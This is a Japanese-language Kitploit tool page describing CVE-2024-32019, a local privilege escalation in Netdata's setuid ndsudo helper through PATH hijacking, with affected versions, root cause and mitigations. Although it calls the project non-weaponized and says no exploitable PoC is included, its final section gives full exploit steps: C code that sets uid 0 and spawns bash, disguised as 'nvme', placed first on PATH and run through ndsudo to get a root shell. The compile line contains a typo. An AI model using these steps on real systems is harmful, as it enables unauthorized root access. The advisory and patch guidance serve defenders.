Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2024-32019-PoC — 非武器化されたPoCおよびCVE-2024-32019のチェッカー。Netdataのndsudoヘルパーにおけるローカル特権昇格。影響範囲の評価、パッチの検証、PATHベースの悪用ベクトルの理解を支援します。 | Kitploit
ツール/GitHubGitHub/sphyos/cve-2024-32019-poc
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubsphyos/cve-2024-32019-poc

cve-2024-32019-PoC

非武器化されたPoCおよびCVE-2024-32019のチェッカー。Netdataのndsudoヘルパーにおけるローカル特権昇格。影響範囲の評価、パッチの検証、PATHベースの悪用ベクトルの理解を支援します。

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-32019 — Netdata ndsudo ローカル権限昇格

概要

Netdata の ndsudo ヘルパー(setuid root でインストール)は実行するコマンドを制限しますが、呼び出し元の PATH を使用してコマンドを解決します。影響を受けるバージョンでは、ローカルユーザーが悪意のあるバイナリを PATH の先頭に配置し、ndsudo にそれを root 権限で実行させることができます。Netdata 1.45.3 および 1.45.0-169 で修正済み。

影響を受けるバージョン / 修正済みバージョン

  • 影響を受ける: >= 1.44.0-60, < 1.45.0-169 および >= 1.45.0, < 1.45.3(アップストリームのアドバイザリによる)。

  • 修正済み: 1.45.3(安定版)、1.45.0-169(ナイトリービルド)。GitHub

影響

ローカルでの root への権限昇格。ndsudo が SUID でインストールされ、ユーザーがそれを呼び出せるシステム(通常は netdata グループのメンバー)で発生します。NVDGitHub

根本原因(概要)

  • ndsudo は SUID-root であり、nvme-list、nvme-smart-log などのサブコマンドをホワイトリストで許可しています。

  • 外部実行可能ファイルを名前で呼び出します(例:nvme)。これは絶対パスや安全な固定検索ではなく、PATH を使って解決されます。

  • 書き込み可能なディレクトリがシステムパスより前に配置されている場合、攻撃者は似た名前のバイナリを導入し、それを root として実行させることができます。GitHub

安全な再現 / 検証

このリポジトリには、以下の非悪用チェッカーが含まれています:

  • /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo(またはインストール先)の SUID/所有者を検査します。

  • PATH 内の一般的なシステムパスより前に現れる書き込み可能なディレクトリを列挙します。

  • ndsudo が実行しようとする可能性のあるホワイトリスト登録されたサブコマンド名の存在を確認します。

  • オプションで ndsudo --test <subcommand> を実行し、解決されたコマンドを実行せずに表示します(注意して使用し、最初にコードを読んでください)。GitHub

⚠️ 悪用可能な PoC は含まれていません。このプロジェクトは、防御者と研究者が責任を持って露出を評価し、パッチを検証するためのものです。

緩和策

  • Netdata を 1.45.3(安定版)または 1.45.0-169(ナイトリービルド)にアップグレードしてください。

  • 多層防御の一環として、SUID ヘルパーでは絶対パスまたはサニタイズされた最小限の PATH を優先してください。不必要な ndsudo アクセスを許可しないようにします。GitHubwiz.io

エクスプロイト手順

1. 次の C コードを nvme.c として保存してください:
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. エクスプロイトをコンパイルする
root@kitploit:~
gcc nvme.c - nvme
3. 環境のセットアップ
root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. PATH を変更する
root@kitploit:~
export PATH=/tmp/fakebin:$PATH
5. エクスプロイトコマンド
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

参考文献

  • NVD: CVE-2024-32019. NVD

  • Netdata アドバイザリ (GHSA-pmhq-4cxq-wj93). GitHub

  • Wiz の概要. wiz.io

  • Snyk の解説. Vulnerability Guide

  • MITRE/CVE リスト. CVE

ツールをダウンロード